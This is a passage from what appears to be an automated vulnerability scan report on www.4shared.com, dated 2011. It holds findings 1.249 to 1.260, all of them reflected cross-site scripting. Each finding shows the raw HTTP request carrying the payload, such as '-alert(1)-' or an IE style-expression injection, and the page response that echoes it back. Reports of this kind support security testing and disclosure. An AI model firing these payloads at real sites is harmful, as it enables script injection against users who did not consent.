GET /desktopb6d46'-alert(1)-'6d03b28270a/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /desktopb6d46'-alert(1)-'6d03b28270a/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C604FFA68ADDB1066D5CF9479A74B47.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:03 GMT
Connection: close
Content-Length: 36103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/desktopb6d46'-alert(1)-'6d03b28270a/',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function en
...[SNIP]...

1.249. http://www.4shared.com/desktop/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb9b8"-alert(1)-"fce9bca0f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /desktopeb9b8"-alert(1)-"fce9bca0f19/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /desktopeb9b8"-alert(1)-"fce9bca0f19/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C96FBC536CDE4E9B1B430C66668E2CE7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:02 GMT
Connection: close
Content-Length: 36103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/desktopeb9b8"-alert(1)-"fce9bca0f19/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

1.250. http://www.4shared.com/enter.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4861a"-alert(1)-"6a1c01b4181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enter.jsp4861a"-alert(1)-"6a1c01b4181 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /enter.jsp4861a"-alert(1)-"6a1c01b4181
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4120E419A42EF4B824AB35C4C8D717A1.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:03 GMT
Connection: close
Content-Length: 36108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/enter.jsp4861a"-alert(1)-"6a1c01b4181";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.251. http://www.4shared.com/enter.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 758ad'-alert(1)-'6cbceef84ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /enter.jsp758ad'-alert(1)-'6cbceef84ff HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /enter.jsp758ad'-alert(1)-'6cbceef84ff
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2795321884BC5F97ED62C3BE86BC2B22.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
ypeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/enter.jsp758ad'-alert(1)-'6cbceef84ff',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.252. http://www.4shared.com/enter.jsp [au parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The value of the au request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 was submitted in the au parameter. This input was echoed as 8fdd1"style="x:expression(alert(1))"f5d5aa7c370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /enter.jsp?sId=o2l1egVaZXKhvv6e&&fau=1&au=18fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9028A42901C0BD18B84955937C69399A.dc278; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: ausk=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: ausk=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:59 GMT
Connection: close
Content-Length: 33211

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or Si
...[SNIP]...
<input type="hidden" name="au" value="18fdd1"style="x:expression(alert(1))"f5d5aa7c370"/>
...[SNIP]...

1.253. http://www.4shared.com/faq.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/faq.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27fa0'-alert(1)-'2efbee4c909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq.jsp27fa0'-alert(1)-'2efbee4c909 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /faq.jsp27fa0'-alert(1)-'2efbee4c909
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A38423E0CF70CF9E1C58B0CFF4AA9E97.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:05 GMT
Connection: close
Content-Length: 36098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/faq.jsp27fa0'-alert(1)-'2efbee4c909',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.254. http://www.4shared.com/faq.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/faq.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aae9"-alert(1)-"b86e0dc65d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /faq.jsp3aae9"-alert(1)-"b86e0dc65d2 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /faq.jsp3aae9"-alert(1)-"b86e0dc65d2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=66F969464FFE73FA334E29977412A1B7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/faq.jsp3aae9"-alert(1)-"b86e0dc65d2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.255. http://www.4shared.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1419'-alert(1)-'5144ad9d88a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod1419'-alert(1)-'5144ad9d88a HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278

Response

HTTP/1.1 404 /favicon.icod1419'-alert(1)-'5144ad9d88a
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:51:37 GMT
Content-Length: 36133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/favicon.icod1419'-alert(1)-'5144ad9d88a',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

1.256. http://www.4shared.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4137e"-alert(1)-"30ce14ead11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4137e"-alert(1)-"30ce14ead11 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278

Response

HTTP/1.1 404 /favicon.ico4137e"-alert(1)-"30ce14ead11
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:51:35 GMT
Content-Length: 36133

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico4137e"-alert(1)-"30ce14ead11";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.257. http://www.4shared.com/icons/16x16/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b6ab'-alert(1)-'4b529eb886e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons3b6ab'-alert(1)-'4b529eb886e/16x16/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons3b6ab'-alert(1)-'4b529eb886e/16x16/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5571D93DB1DC9D82DA31A1D8CA665FA8.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:35 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons3b6ab'-alert(1)-'4b529eb886e/16x16/',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

funct
...[SNIP]...

1.258. http://www.4shared.com/icons/16x16/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c041"-alert(1)-"b5aa33779a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons9c041"-alert(1)-"b5aa33779a/16x16/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons9c041"-alert(1)-"b5aa33779a/16x16/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=10E3680EA5CFAB4BF9BFADD373585B14.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:34 GMT
Connection: close
Content-Length: 36118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons9c041"-alert(1)-"b5aa33779a/16x16/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
v
...[SNIP]...

1.259. http://www.4shared.com/icons/16x16/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad5eb'-alert(1)-'2885685dbf8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /icons/16x16ad5eb'-alert(1)-'2885685dbf8/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons/16x16ad5eb'-alert(1)-'2885685dbf8/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=44CDE609A43CEA72669AE5D9B0BAB612.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:40 GMT
Connection: close
Content-Length: 36123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>4shared.co
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/icons/16x16ad5eb'-alert(1)-'2885685dbf8/',
remember : false

},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function en
...[SNIP]...

1.260. http://www.4shared.com/icons/16x16/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/icons/16x16/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cc4"-alert(1)-"8ad53ce0672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

